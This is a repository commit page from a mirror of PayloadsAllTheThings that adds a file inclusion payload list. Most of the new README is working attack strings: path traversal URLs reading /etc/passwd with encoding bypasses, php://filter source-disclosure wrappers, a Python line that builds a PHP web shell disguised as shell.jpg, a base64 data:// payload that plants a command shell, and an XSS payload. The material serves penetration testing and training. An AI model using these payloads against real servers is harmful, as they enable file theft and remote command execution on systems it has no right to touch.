mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
PHP Include payloads
This commit is contained in:
parent
06539ddb23
commit
8317ae4a60
40
PHP_Include/README.md
Normal file
40
PHP_Include/README.md
Normal file
@ -0,0 +1,40 @@
|
||||
# Local/Remote File Inclusion
|
||||
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
|
||||
|
||||
## Exploit
|
||||
|
||||
Basic LFI (null byte and double encoding)
|
||||
```
|
||||
http://example.com/index.php?page=etc/passwd
|
||||
http://example.com/index.php?page=etc/passwd%00
|
||||
http://example.com/index.php?page=../../etc/passwd
|
||||
http://example.com/index.php?page=%252e%252e%252f
|
||||
```
|
||||
|
||||
LFI Wrapper rot13 and base64
|
||||
```
|
||||
php://filter/read=string.rot13/resource=
|
||||
php://filter/convert.base64-encode/resource=
|
||||
```
|
||||
|
||||
LFI Wrapper zip
|
||||
```python
|
||||
os.system("echo \"</pre><?php system($_GET['cmd']); ?></pre>\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php")
|
||||
|
||||
zip://shell.jpg%23payload.php
|
||||
```
|
||||
|
||||
|
||||
RFI Wrapper with "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" payload
|
||||
```
|
||||
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
|
||||
```
|
||||
|
||||
|
||||
XSS via RFI/LFI with "<svg onload=alert(1)>" payload
|
||||
```
|
||||
data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
|
@ -1,8 +1,7 @@
|
||||
# Payloads All The Things
|
||||
a# Payloads All The Things
|
||||
A list of usefull payloads and bypasses for Web Application Security
|
||||
|
||||
TODO:
|
||||
* PHP Include
|
||||
* PHP Serialization
|
||||
* CSV Injection
|
||||
|
||||
@ -15,8 +14,10 @@ To improve:
|
||||
* Tar command exec
|
||||
* Traversal Directory
|
||||
* XSS
|
||||
* PHP Include
|
||||
|
||||
TODO v2:
|
||||
* Remove "_" in dir name
|
||||
* Add CVE : Hearbleed and ShellShock ?
|
||||
|
||||
# /!\ Work in Progress : 40%
|
||||
|
Loading…
Reference in New Issue
Block a user